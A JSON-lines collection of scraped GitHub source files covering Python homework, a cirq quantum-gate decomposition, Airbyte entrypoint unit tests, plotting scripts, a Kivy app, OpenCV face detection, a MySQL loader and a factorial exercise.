+{"seq_id":"20837569319","text":"# Напишите программу, которая по заданному номеру четверти \n# показывает диапазон возможных координат точек в этой четверти (x и y).\n\n# print('Введите номер четверти')\n# n = int(input())\n# if n == 1:\n# print('x = (0; +∞) y = (0; +∞)')\n# elif n == 2:\n# print('x = (0; +∞) y = (-∞; 0)')\n# elif n == 3:\n# print('x = (-∞; 0) y = (-∞; 0)')\n# elif n == 4:\n# print('x = (-∞; 0) y = (0; +∞)')\n\nnumber = int(input()) # на строку ниже создаем словарь по ключу\nd = {1: 'x = (0; +∞) y = (0; +∞)', 2: 'x = (0; +∞) y = (-∞; 0)', 3: 'x = (-∞; 0) y = (-∞; 0)', 4: 'x = (-∞; 0) y = (0; +∞)'}\nprint(d[number])","repo_name":"IljaBoroznov/pithon_homework","sub_path":"Homework_1/Task_3.py","file_name":"Task_3.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"21908624978","text":"from typing import List, Tuple\n\nimport numpy as np\nimport cirq\nfrom cirq import optimizers\n\n\ndef matrix_to_sycamore_operations(\n target_qubits: List[cirq.GridQubit], matrix: np.ndarray\n) -> Tuple[cirq.OP_TREE, List[cirq.GridQubit]]:\n \"\"\"A method to convert a unitary matrix to a list of Sycamore operations.\n\n This method will return a list of `cirq.Operation`s using the qubits and (optionally) ancilla\n qubits to implement the unitary matrix `matrix` on the target qubits `qubits`.\n The operations are also supported by `cirq.google.gate_sets.SYC_GATESET`.\n\n Args:\n target_qubits: list of qubits the returned operations will act on. The qubit order defined by the list\n is assumed to be used by the operations to implement `matrix`.\n matrix: a matrix that is guaranteed to be unitary and of size (2**len(qs), 2**len(qs)).\n Returns:\n A tuple of operations and ancilla qubits allocated.\n Operations: In case the matrix is supported, a list of operations `ops` is returned.\n `ops` acts on `qs` qubits and for which `cirq.unitary(ops)` is equal to `matrix` up\n to certain tolerance. In case the matrix is not supported, it might return NotImplemented to\n reduce the noise in the judge output.\n Ancilla qubits: In case ancilla qubits are allocated a list of ancilla qubits. Otherwise\n an empty list.\n .\n \"\"\"\n num_of_qubits = len(target_qubits)\n\n if np.all(np.equal(matrix, np.eye(2 ** num_of_qubits))):\n # Simple Identity Check\n ops_list = []\n for qubit in target_qubits:\n op = cirq.Z(qubit) ** 0\n cirq.google.Sycamore.validate_operation(op)\n ops_list.append(cirq.Z(qubit) ** 0)\n return ops_list, []\n\n if num_of_qubits == 1:\n # single qubit gates\n gate = optimizers.single_qubit_matrix_to_phxz(matrix)\n cirq.google.Sycamore.validate_operation(gate(target_qubits[0]))\n return [gate(target_qubits[0])], []\n\n elif num_of_qubits == 2:\n # two qubit gates\n ops_list = optimizers.two_qubit_matrix_to_operations(target_qubits[0], target_qubits[1], matrix,\n allow_partial_czs=True)\n ConvertToSycamoreGates = cirq.google.ConvertToSycamoreGates()\n converted_ops_list = ConvertToSycamoreGates.convert(op=ops_list)\n return converted_ops_list, []\n\n elif is_incremental(matrix):\n ancilla = find_neighbor_available_qubit(target_qubits)\n return decompose_incrementer_matrix(target_qubits, ancilla), [ancilla]\n\n elif num_of_qubits == 3:\n # three qubit gates\n ops_list = optimizers.three_qubit_matrix_to_operations(target_qubits[0], target_qubits[1], target_qubits[2],\n matrix)\n\n return ops_list, []\n\n elif np.count_nonzero(matrix - np.diag(np.diagonal(matrix))) == 0:\n # diagonal gates with more than 3 qubits\n angle_list = []\n for i in np.arange(np.shape(matrix)[0]):\n angle_list.append(np.angle(matrix[i, i]))\n diagonal_gate = cirq.ops.DiagonalGate(angle_list)\n ops_list = diagonal_gate._decompose_(qubits=target_qubits)\n\n return ops_list, []\n\n elif num_of_qubits == 4:\n ancilla = find_neighbor_available_qubit(target_qubits)\n CTOFFLI_mat = cirq.unitary(\n cirq.ops.ControlledOperation(controls=[target_qubits[0], target_qubits[1], target_qubits[2]],\n sub_operation=cirq.X(target_qubits[3])))\n if np.all(np.equal(matrix, CTOFFLI_mat)):\n ops_list = []\n ConvertToSycamoreGates = cirq.google.ConvertToSycamoreGates()\n decomposed_ops = cirq.optimizers.decompose_multi_controlled_x(\n controls=[target_qubits[2], target_qubits[1], target_qubits[0]], target=target_qubits[3],\n free_qubits=[ancilla])\n 
ops_list.append(ConvertToSycamoreGates.convert(decomposed_ops))\n return ops_list, [ancilla]\n\n\n else:\n ops_list = []\n for qubit in target_qubits:\n op = cirq.Z(qubit) ** 0\n cirq.google.Sycamore.validate_operation(op)\n ops_list.append(cirq.Z(qubit) ** 0)\n return ops_list, []\n\ndef is_incremental(mat):\n mat_new = np.zeros([np.shape(mat)[0], np.shape(mat)[1]])\n mat_new[0:-1, :] = mat[1:, :]\n mat_new[-1, :] = mat[0, :]\n\n return np.count_nonzero(mat_new - np.diag(np.diagonal(mat_new))) == 0\n\n\ndef decompose_incrementer_matrix(target_qubits, ancilla):\n ConvertToSycamoreGates = cirq.google.ConvertToSycamoreGates()\n num_of_qubits = len(target_qubits)\n # assume num_of_qubits>=3\n q = target_qubits[::-1]\n op_list = []\n\n if num_of_qubits > 7:\n decomposed_ops = cirq.optimizers.decompose_multi_controlled_x(\n controls=[q[0], q[1], q[2], q[3], q[4], q[5], q[6]],\n target=q[7], free_qubits=[ancilla])\n op_list.append(ConvertToSycamoreGates.convert(decomposed_ops))\n\n if num_of_qubits > 6:\n decomposed_ops = cirq.optimizers.decompose_multi_controlled_x(controls=[q[0], q[1], q[2], q[3], q[4], q[5]],\n target=q[6], free_qubits=[ancilla])\n op_list.append(ConvertToSycamoreGates.convert(decomposed_ops))\n\n if num_of_qubits > 5:\n decomposed_ops = cirq.optimizers.decompose_multi_controlled_x(controls=[q[0], q[1], q[2], q[3], q[4]],\n target=q[5],\n free_qubits=[ancilla])\n op_list.append(ConvertToSycamoreGates.convert(decomposed_ops))\n\n if num_of_qubits > 4:\n decomposed_ops = cirq.optimizers.decompose_multi_controlled_x(controls=[q[0], q[1], q[2], q[3]], target=q[4],\n free_qubits=[ancilla])\n op_list.append(ConvertToSycamoreGates.convert(decomposed_ops))\n\n if num_of_qubits > 3:\n decomposed_ops = cirq.optimizers.decompose_multi_controlled_x(controls=[q[0], q[1], q[2]], target=q[3],\n free_qubits=[ancilla])\n op_list.append(ConvertToSycamoreGates.convert(decomposed_ops))\n op_list.append(ConvertToSycamoreGates.convert(op=cirq.TOFFOLI(q[0], q[1], q[2])))\n\n op_list.append(ConvertToSycamoreGates.convert(op=cirq.CNOT(q[0], q[1])))\n\n op_list.append(cirq.X(q[0]))\n\n return op_list\n\ndef find_neighbor_available_qubit(target_qubits):\n for target_qubit in target_qubits:\n neighbor_qubits = target_qubit.neighbors()\n for neighbor_qubit in neighbor_qubits:\n if neighbor_qubit not in target_qubits:\n return neighbor_qubit\n\n","repo_name":"ziweiqiu/qchack-2021-challenge","sub_path":"solution/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":6934,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"}
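# A quick sanity check for matrix_to_sycamore_operations() during development:
# rebuild the unitary from the returned operations and compare it with the
# target up to global phase. Sketch; assumes the function above is importable
# and that the chosen GridQubits are adjacent on the device.
import cirq

qubits = [cirq.GridQubit(3, 5), cirq.GridQubit(3, 6)]
target = cirq.unitary(cirq.CNOT)  # example 2-qubit unitary

ops, ancillae = matrix_to_sycamore_operations(qubits, target)
rebuilt = cirq.Circuit(ops).unitary(qubit_order=qubits)
assert cirq.allclose_up_to_global_phase(rebuilt, target)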
+{"seq_id":"20187226731","text":"import os\nfrom argparse import Namespace\nfrom copy import deepcopy\nfrom typing import Any, List, Mapping, MutableMapping, Union\nfrom unittest import mock\nfrom unittest.mock import MagicMock, patch\n\nimport pytest\nimport requests\nfrom airbyte_cdk import AirbyteEntrypoint\nfrom airbyte_cdk import entrypoint as entrypoint_module\nfrom airbyte_cdk.models import (\n AirbyteCatalog,\n AirbyteConnectionStatus,\n AirbyteControlConnectorConfigMessage,\n AirbyteControlMessage,\n AirbyteMessage,\n AirbyteRecordMessage,\n AirbyteStream,\n ConnectorSpecification,\n OrchestratorType,\n Status,\n SyncMode,\n Type,\n)\nfrom airbyte_cdk.sources import Source\n\n\nclass MockSource(Source):\n def read(self, **kwargs):\n pass\n\n def discover(self, **kwargs):\n pass\n\n def check(self, **kwargs):\n pass\n\n @property\n def message_repository(self):\n pass\n\n\ndef _as_arglist(cmd: str, named_args: Mapping[str, Any]) -> List[str]:\n out = [cmd]\n for k, v in named_args.items():\n out.append(f\"--{k}\")\n if v:\n out.append(v)\n return out\n\n\n@pytest.fixture\ndef spec_mock(mocker):\n expected = ConnectorSpecification(connectionSpecification={})\n mock = MagicMock(return_value=expected)\n mocker.patch.object(MockSource, \"spec\", mock)\n return mock\n\n\nMESSAGE_FROM_REPOSITORY = AirbyteMessage(\n type=Type.CONTROL,\n control=AirbyteControlMessage(\n type=OrchestratorType.CONNECTOR_CONFIG,\n emitted_at=10,\n connectorConfig=AirbyteControlConnectorConfigMessage(config={\"any config\": \"a config value\"}),\n ),\n)\n\n\n@pytest.fixture\ndef entrypoint(mocker) -> AirbyteEntrypoint:\n message_repository = MagicMock()\n message_repository.consume_queue.side_effect = [[message for message in [MESSAGE_FROM_REPOSITORY]], []]\n mocker.patch.object(MockSource, \"message_repository\", new_callable=mocker.PropertyMock, return_value=message_repository)\n return AirbyteEntrypoint(MockSource())\n\n\ndef test_airbyte_entrypoint_init(mocker):\n mocker.patch.object(entrypoint_module, \"init_uncaught_exception_handler\")\n AirbyteEntrypoint(MockSource())\n entrypoint_module.init_uncaught_exception_handler.assert_called_once_with(entrypoint_module.logger)\n\n\n@pytest.mark.parametrize(\n [\"cmd\", \"args\", \"expected_args\"],\n [\n (\"spec\", {\"debug\": \"\"}, {\"command\": \"spec\", \"debug\": True}),\n (\"check\", {\"config\": \"config_path\"}, {\"command\": \"check\", \"config\": \"config_path\", \"debug\": False}),\n (\"discover\", {\"config\": \"config_path\", \"debug\": \"\"}, {\"command\": \"discover\", \"config\": \"config_path\", \"debug\": True}),\n (\n \"read\",\n {\"config\": \"config_path\", \"catalog\": \"catalog_path\", \"state\": \"None\"},\n {\"command\": \"read\", \"config\": \"config_path\", \"catalog\": \"catalog_path\", \"state\": \"None\", \"debug\": False},\n ),\n (\n \"read\",\n {\"config\": \"config_path\", \"catalog\": \"catalog_path\", \"state\": \"state_path\", \"debug\": \"\"},\n {\"command\": \"read\", \"config\": \"config_path\", \"catalog\": \"catalog_path\", \"state\": \"state_path\", \"debug\": True},\n ),\n ],\n)\ndef test_parse_valid_args(cmd: str, args: Mapping[str, Any], expected_args, entrypoint: AirbyteEntrypoint):\n arglist = _as_arglist(cmd, args)\n parsed_args = entrypoint.parse_args(arglist)\n assert vars(parsed_args) == expected_args\n\n\n@pytest.mark.parametrize(\n [\"cmd\", \"args\"],\n [\n (\"check\", {\"config\": \"config_path\"}),\n (\"discover\", {\"config\": \"config_path\"}),\n (\"read\", {\"config\": \"config_path\", \"catalog\": 
\"catalog_path\"}),\n ],\n)\ndef test_parse_missing_required_args(cmd: str, args: MutableMapping[str, Any], entrypoint: AirbyteEntrypoint):\n required_args = {\"check\": [\"config\"], \"discover\": [\"config\"], \"read\": [\"config\", \"catalog\"]}\n for required_arg in required_args[cmd]:\n argcopy = deepcopy(args)\n del argcopy[required_arg]\n with pytest.raises(BaseException):\n entrypoint.parse_args(_as_arglist(cmd, argcopy))\n\n\ndef _wrap_message(submessage: Union[AirbyteConnectionStatus, ConnectorSpecification, AirbyteRecordMessage, AirbyteCatalog]) -> str:\n if isinstance(submessage, AirbyteConnectionStatus):\n message = AirbyteMessage(type=Type.CONNECTION_STATUS, connectionStatus=submessage)\n elif isinstance(submessage, ConnectorSpecification):\n message = AirbyteMessage(type=Type.SPEC, spec=submessage)\n elif isinstance(submessage, AirbyteCatalog):\n message = AirbyteMessage(type=Type.CATALOG, catalog=submessage)\n elif isinstance(submessage, AirbyteRecordMessage):\n message = AirbyteMessage(type=Type.RECORD, record=submessage)\n else:\n raise Exception(f\"Unknown message type: {submessage}\")\n\n return message.json(exclude_unset=True)\n\n\ndef test_run_spec(entrypoint: AirbyteEntrypoint, mocker):\n parsed_args = Namespace(command=\"spec\")\n expected = ConnectorSpecification(connectionSpecification={\"hi\": \"hi\"})\n mocker.patch.object(MockSource, \"spec\", return_value=expected)\n\n messages = list(entrypoint.run(parsed_args))\n\n assert [MESSAGE_FROM_REPOSITORY.json(exclude_unset=True), _wrap_message(expected)] == messages\n\n\n@pytest.fixture\ndef config_mock(mocker, request):\n config = request.param if hasattr(request, \"param\") else {\"username\": \"fake\"}\n mocker.patch.object(MockSource, \"read_config\", return_value=config)\n mocker.patch.object(MockSource, \"configure\", return_value=config)\n return config\n\n\n@pytest.mark.parametrize(\n \"config_mock, schema, config_valid\",\n [\n ({\"username\": \"fake\"}, {\"type\": \"object\", \"properties\": {\"name\": {\"type\": \"string\"}}, \"additionalProperties\": False}, False),\n ({\"username\": \"fake\"}, {\"type\": \"object\", \"properties\": {\"username\": {\"type\": \"string\"}}, \"additionalProperties\": False}, True),\n ({\"username\": \"fake\"}, {\"type\": \"object\", \"properties\": {\"user\": {\"type\": \"string\"}}}, True),\n ({\"username\": \"fake\"}, {\"type\": \"object\", \"properties\": {\"user\": {\"type\": \"string\", \"airbyte_secret\": True}}}, True),\n (\n {\"username\": \"fake\", \"_limit\": 22},\n {\"type\": \"object\", \"properties\": {\"username\": {\"type\": \"string\"}}, \"additionalProperties\": False},\n True,\n ),\n ],\n indirect=[\"config_mock\"],\n)\ndef test_config_validate(entrypoint: AirbyteEntrypoint, mocker, config_mock, schema, config_valid):\n parsed_args = Namespace(command=\"check\", config=\"config_path\")\n check_value = AirbyteConnectionStatus(status=Status.SUCCEEDED)\n mocker.patch.object(MockSource, \"check\", return_value=check_value)\n mocker.patch.object(MockSource, \"spec\", return_value=ConnectorSpecification(connectionSpecification=schema))\n\n messages = list(entrypoint.run(parsed_args))\n if config_valid:\n assert [MESSAGE_FROM_REPOSITORY.json(exclude_unset=True), _wrap_message(check_value)] == messages\n else:\n assert len(messages) == 2\n assert messages[0] == MESSAGE_FROM_REPOSITORY.json(exclude_unset=True)\n connection_status_message = AirbyteMessage.parse_raw(messages[1])\n assert connection_status_message.type == Type.CONNECTION_STATUS\n assert 
connection_status_message.connectionStatus.status == Status.FAILED\n assert connection_status_message.connectionStatus.message.startswith(\"Config validation error:\")\n\n\ndef test_run_check(entrypoint: AirbyteEntrypoint, mocker, spec_mock, config_mock):\n parsed_args = Namespace(command=\"check\", config=\"config_path\")\n check_value = AirbyteConnectionStatus(status=Status.SUCCEEDED)\n mocker.patch.object(MockSource, \"check\", return_value=check_value)\n\n messages = list(entrypoint.run(parsed_args))\n\n assert [MESSAGE_FROM_REPOSITORY.json(exclude_unset=True), _wrap_message(check_value)] == messages\n assert spec_mock.called\n\n\ndef test_run_check_with_exception(entrypoint: AirbyteEntrypoint, mocker, spec_mock, config_mock):\n parsed_args = Namespace(command=\"check\", config=\"config_path\")\n mocker.patch.object(MockSource, \"check\", side_effect=ValueError(\"Any error\"))\n\n with pytest.raises(ValueError):\n messages = list(entrypoint.run(parsed_args))\n assert [MESSAGE_FROM_REPOSITORY.json(exclude_unset=True)] == messages\n\n\ndef test_run_discover(entrypoint: AirbyteEntrypoint, mocker, spec_mock, config_mock):\n parsed_args = Namespace(command=\"discover\", config=\"config_path\")\n expected = AirbyteCatalog(streams=[AirbyteStream(name=\"stream\", json_schema={\"k\": \"v\"}, supported_sync_modes=[SyncMode.full_refresh])])\n mocker.patch.object(MockSource, \"discover\", return_value=expected)\n\n messages = list(entrypoint.run(parsed_args))\n\n assert [MESSAGE_FROM_REPOSITORY.json(exclude_unset=True), _wrap_message(expected)] == messages\n assert spec_mock.called\n\n\ndef test_run_discover_with_exception(entrypoint: AirbyteEntrypoint, mocker, spec_mock, config_mock):\n parsed_args = Namespace(command=\"discover\", config=\"config_path\")\n mocker.patch.object(MockSource, \"discover\", side_effect=ValueError(\"Any error\"))\n\n with pytest.raises(ValueError):\n messages = list(entrypoint.run(parsed_args))\n assert [MESSAGE_FROM_REPOSITORY.json(exclude_unset=True)] == messages\n\n\ndef test_run_read(entrypoint: AirbyteEntrypoint, mocker, spec_mock, config_mock):\n parsed_args = Namespace(command=\"read\", config=\"config_path\", state=\"statepath\", catalog=\"catalogpath\")\n expected = AirbyteRecordMessage(stream=\"stream\", data={\"data\": \"stuff\"}, emitted_at=1)\n mocker.patch.object(MockSource, \"read_state\", return_value={})\n mocker.patch.object(MockSource, \"read_catalog\", return_value={})\n mocker.patch.object(MockSource, \"read\", return_value=[AirbyteMessage(record=expected, type=Type.RECORD)])\n\n messages = list(entrypoint.run(parsed_args))\n\n assert [_wrap_message(expected), MESSAGE_FROM_REPOSITORY.json(exclude_unset=True)] == messages\n assert spec_mock.called\n\n\ndef test_run_read_with_exception(entrypoint: AirbyteEntrypoint, mocker, spec_mock, config_mock):\n parsed_args = Namespace(command=\"read\", config=\"config_path\", state=\"statepath\", catalog=\"catalogpath\")\n mocker.patch.object(MockSource, \"read_state\", return_value={})\n mocker.patch.object(MockSource, \"read_catalog\", return_value={})\n mocker.patch.object(MockSource, \"read\", side_effect=ValueError(\"Any error\"))\n\n with pytest.raises(ValueError):\n messages = list(entrypoint.run(parsed_args))\n assert [MESSAGE_FROM_REPOSITORY.json(exclude_unset=True)] == messages\n\n\ndef test_invalid_command(entrypoint: AirbyteEntrypoint, config_mock):\n with pytest.raises(Exception):\n list(entrypoint.run(Namespace(command=\"invalid\", config=\"conf\")))\n\n\n@pytest.mark.parametrize(\n 
\"deployment_mode, url, expected_error\",\n [\n pytest.param(\"CLOUD\", \"https://airbyte.com\", None, id=\"test_cloud_public_endpoint_is_successful\"),\n pytest.param(\"CLOUD\", \"https://192.168.27.30\", ValueError, id=\"test_cloud_private_ip_address_is_rejected\"),\n pytest.param(\"CLOUD\", \"https://localhost:8080/api/v1/cast\", ValueError, id=\"test_cloud_private_endpoint_is_rejected\"),\n pytest.param(\"CLOUD\", \"http://past.lives.net/api/v1/inyun\", ValueError, id=\"test_cloud_unsecured_endpoint_is_rejected\"),\n pytest.param(\"CLOUD\", \"https://not:very/cash:443.money\", ValueError, id=\"test_cloud_invalid_url_format\"),\n pytest.param(\"CLOUD\", \"https://192.168.27.30 \", ValueError, id=\"test_cloud_incorrect_ip_format_is_rejected\"),\n pytest.param(\"cloud\", \"https://192.168.27.30\", ValueError, id=\"test_case_insensitive_cloud_environment_variable\"),\n pytest.param(\"OSS\", \"https://airbyte.com\", None, id=\"test_oss_public_endpoint_is_successful\"),\n pytest.param(\"OSS\", \"https://192.168.27.30\", None, id=\"test_oss_private_endpoint_is_successful\"),\n pytest.param(\"OSS\", \"https://localhost:8080/api/v1/cast\", None, id=\"test_oss_private_endpoint_is_successful\"),\n pytest.param(\"OSS\", \"http://past.lives.net/api/v1/inyun\", None, id=\"test_oss_unsecured_endpoint_is_successful\"),\n ],\n)\n@patch.object(requests.Session, \"send\", lambda self, request, **kwargs: requests.Response())\ndef test_filter_internal_requests(deployment_mode, url, expected_error):\n with mock.patch.dict(os.environ, {\"DEPLOYMENT_MODE\": deployment_mode}, clear=False):\n AirbyteEntrypoint(source=MockSource())\n\n session = requests.Session()\n\n prepared_request = requests.PreparedRequest()\n prepared_request.method = \"GET\"\n prepared_request.headers = {\"header\": \"value\"}\n prepared_request.url = url\n\n if expected_error:\n with pytest.raises(expected_error):\n session.send(request=prepared_request)\n else:\n actual_response = session.send(request=prepared_request)\n assert isinstance(actual_response, requests.Response)\n","repo_name":"airbytehq/airbyte","sub_path":"airbyte-cdk/python/unit_tests/test_entrypoint.py","file_name":"test_entrypoint.py","file_ext":"py","file_size_in_byte":12872,"program_lang":"python","lang":"en","doc_type":"code","stars":12323,"dataset":"github-code","pt":"35"}
+{"seq_id":"30731504869","text":"\"\"\"\nThis is the source file for the example spectrum. It has the dependencies of\nusing LaTeX with matplotlib. (See https://matplotlib.org/users/usetex.html) If\na LaTeX independent version is desired, simply comment out the line\nplt.rc('text', usetex=True)\n\"\"\"\n\nimport os\nimport re\n\nimport matplotlib.pyplot as plt\n\nimport lrspectrum\n\n\n# Get multiple logfiles\nlglst = []\nfor fil in os.listdir('.'):\n rexp = re.compile('example_\\d.log')\n if rexp.match(fil) is not None:\n lglst.append(fil)\n\nlr = lrspectrum.LRSpectrum(lglst)\nlr.gen_spect(broad=1.0, wlim=(1530, 1570), res=200)\n\n# Plotting options\nplt.rc('text', usetex=True)\nplt.rc('font', family='serif')\nplt.rc('xtick', top=True, direction='in')\nplt.rc('xtick.major', size=4.5, pad=7)\nplt.rc('xtick.minor', visible=True)\nplt.rc('ytick', right=True, direction='in')\nplt.rc('ytick.major', size=4.5)\nplt.rc('ytick.minor', visible=True)\n\nf, ax = plt.subplots(figsize=(4.25, 3.25))\nlr.plot(ax=ax, xlim=(1555, 1575), xshift=23, ylabel='Intensity (Arb.)',\n xlabel='Energy (eV)', yscale=1000, sticks=False, ylim=(0, 3), ls='-',\n c='k', lw=1.5)\n# Doing labels outside for fontsize\nax.set_xlabel('Energy (eV)', fontsize=14)\nax.set_ylabel('Intensity (Arb.)', fontsize=14)\n'''\nax.set_xticklabels(['1555', '', '1556', '', '1557', '', '1558', '', '1559', '',\n '1560', '', '1561', '', '1562', '', '1563', '', '1564', '',\n '1565', '', '1566', '', '1567', '', '1568', '', '1569', '',\n '1570']\n ) \n'''\nax.set_xticklabels([str(i) for i in range(1555, 1571)])\nax.set_title('Calculated Aluminum K-Edge', fontsize=16, fontweight='bold')\nplt.tight_layout()\nplt.savefig('aluminumKedge.png', dpi=500)\nplt.show()\n","repo_name":"awild82/lrspectrum","sub_path":"doc/media/example_graph.py","file_name":"example_graph.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}
+{"seq_id":"18037319669","text":"import kivy\nfrom kivy.app import App\nfrom kivy.uix.button import Button\nfrom kivy.uix.image import Image\nfrom kivy.uix.widget import Widget\nfrom kivy.config import Config \nfrom socket import *\nfrom kivy.graphics import Rectangle\n\nf1,f2,f3 = False, False, False\n\nclass testWidget(Widget):\n\tdef on_touch_down(self,touch):\n\t\tglobal f1,f2,f3\n\t\tif 'markerid' in touch.profile:\n\t\t\tif touch.fid==2:\n\t\t\t\tf1=True\n\t\t\t\tprint(\"yes1\")\n\t\t\t\t\n\t\t\tif touch.fid==4:\n\t\t\t\tf2=True\n\t\t\t\tprint(\"yes2\")\n\t\t\t\t\n\t\t\tif f1 and f2:\n\t\t\t\twith self.canvas.before:\n\t\t\t\t\tRectangle(source=\"Map2.jpg\",pos=self.pos,size=self.size)\nclass Shortest_pathApp(App):\n\tdef build(self):\n\t\tConfig.set('input','fid1','tuio,0.0.0.0:3333')\n\t\treturn testWidget()\n\n\t\nif __name__ == '__main__':\n\tShortest_pathApp().run()\n","repo_name":"aliasgar521/KivyProject","sub_path":"Shortest path/shortest_path.py","file_name":"shortest_path.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"897632162","text":"import cv2, os\n\ncascPath = r\"C:\\Users\\Administrator\\Desktop\\FaceDetection\\haarcascade_frontalface_default.xml\"\nfaceCascade = cv2.CascadeClassifier(cascPath)\n\nlive = cv2.VideoCapture(0)\n\nwhile True:\n # Capture frame-by-frame\n ret, frame = live.read()\n\n # Converting frame to grayscale\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n # using haarcascade\n faces = faceCascade.detectMultiScale(\n gray,\n scaleFactor=1.1,\n minNeighbors=5,\n minSize=(1,1),\n flags = cv2.CASCADE_SCALE_IMAGE)\n\n os.system(\"cls\")\n print(\"Detected {0} faces!\".format(len(faces)))\n\n\n for (x, y, w, h) in faces:\n cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 0), 2)\n\n cv2.imshow(\"Faces Detected\", frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# Release the capture\nlive.release()\ncv2.destroyAllWindows()","repo_name":"karan10072002/face_detection","sub_path":"face_detection.py","file_name":"face_detection.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"44052922959","text":"__author__ = 'mirko'\n\nfrom sklearn.externals import joblib\nfrom Tweet import make_tweet\nimport os.path\nimport pymysql\nimport config as cfg\n\nclass Database_manager(object):\n\n db=None\n cur=None\n\n def __init__(self):\n\n self.db = pymysql.connect(host=cfg.mysql['host'],\n user=cfg.mysql['user'],\n passwd=cfg.mysql['passwd'],\n db=cfg.mysql['db'],\n charset='utf8')\n self.cur = self.db.cursor()\n self.cur.execute('SET NAMES utf8mb4')\n self.cur.execute(\"SET CHARACTER SET utf8mb4\")\n self.cur.execute(\"SET character_set_connection=utf8mb4\")\n self.db.commit()\n\n def return_test(self):\n\n\n if os.path.isfile('test.pkl') :\n tweets= joblib.load('test.pkl')\n return tweets\n\n\n tweets=[]\n self.cur.execute(\" SELECT `id`, `content`, `language`, `stance`, `gender` \"\n \" FROM `test \")\n i=0\n for tweet in self.cur.fetchall():\n i+=1\n id=tweet[0]\n content=tweet[1]\n language=tweet[2]\n stance=tweet[3]\n gender=tweet[4]\n\n\n this_tweet=make_tweet(id, content,language, stance, gender )\n\n tweets.append(this_tweet)\n\n joblib.dump(tweets, 'test.pkl')\n\n return tweets\n\n\n\n def return_training(self, language=None):\n\n if language==\"ca\" or language==\"es\":\n filter=\" where language='\"+language+\"'\"\n else:\n filter=\"\"\n\n\n if os.path.isfile('training'+filter+'.pkl') :\n tweets= joblib.load('training'+filter+'.pkl')\n return tweets\n\n\n tweets=[]\n\n\n self.cur.execute(\" SELECT `id`, `content`, `language`, `stance`, `gender` \"\n \" FROM `training` \"+filter)\n i=0\n for tweet in self.cur.fetchall():\n i+=1\n id=tweet[0]\n content=tweet[1]\n language=tweet[2]\n stance=tweet[3]\n gender=tweet[4]\n\n\n this_tweet=make_tweet(id, content,language, stance, gender )\n\n tweets.append(this_tweet)\n\n joblib.dump(tweets, 'training'+filter+'.pkl')\n\n return tweets\n\n\n\n\n\ndef make_database_manager():\n database_manager = Database_manager()\n\n return database_manager\n\n\nif __name__ == '__main__':\n database_manager = Database_manager()\n tweets=database_manager.return_training()\n\n","repo_name":"mirkolai/iTACOS-at-IberEval2017","sub_path":"Database_manager.py","file_name":"Database_manager.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"35706654490","text":"#import libraries\nimport matplotlib.pyplot as plt \nimport pandas as pd\nimport streamlit as st\nimport numpy as np\nimport matplotlib\n#matplotlib.use('Agg')\nimport seaborn as sns \n#Remove Warnings\nst.balloons()\nst.set_option('deprecation.showPyplotGlobalUse', False)\nst.title(\"District_Level_School_Dataset\")\n\n#import dataset\ndf = pd.read_csv('DistrictLevelData_V3.csv')\n\n#First thirty rows\nattendance = df.head(30)\n#Display the table\nst.table(attendance)\nst.header(\"Visualisation Using Seaborn\")\n#bar plot\nst.subheader(\"Bar Plot\")\nattendance.plot(kind='bar')\nst.pyplot()\n#pairplot\nst.subheader(\"Pairplot\")\nsns.pairplot(attendance,)\nst.pyplot()\n#Displot\nst.subheader(\"Displot\")\nsns.displot(attendance['CovidTotalStateCases'])\nst.pyplot()\n#joinplot\nst.subheader(\"JointPlot\")\nsns.jointplot(x='Mem',y='AttendancePercent',data=attendance,kind='hex',color=\"#4CB391\")\nst.pyplot()\n\n#Correation\nst.subheader(\"Heatmap\")\nsns.heatmap(attendance.corr(),cmap='coolwarm',annot=True)\nst.pyplot()\n#Replot\nst.subheader(\"RelPlot\")\nsns.relplot(x='CovidTotalStateCases',y='CovidTotalCountyCases',hue='Weekday', data=attendance)\nst.pyplot()\n\n ","repo_name":"sangeethar25/geeth_assignment","sub_path":"school.py","file_name":"school.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"4957267266","text":"# print square roots in Python language. R. Brown, 9/2010 \n\nfrom math import sqrt\n\n\ndef factorial(x):\n\tresult=1\n\ti=1\n\twhile (i>=1 and i<(n+1)):\n\t\tresult=result*i\n\t\ti=i+1\n\n\treturn result\n\nprint(\"n\\tn!\\n----------------\")\nn=0\nwhile (n<6):\n print(n,\"\\t\",factorial(n))\n n=n+1","repo_name":"kalapathar/hardware_design","sub_path":"hw7/facts.py","file_name":"facts.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
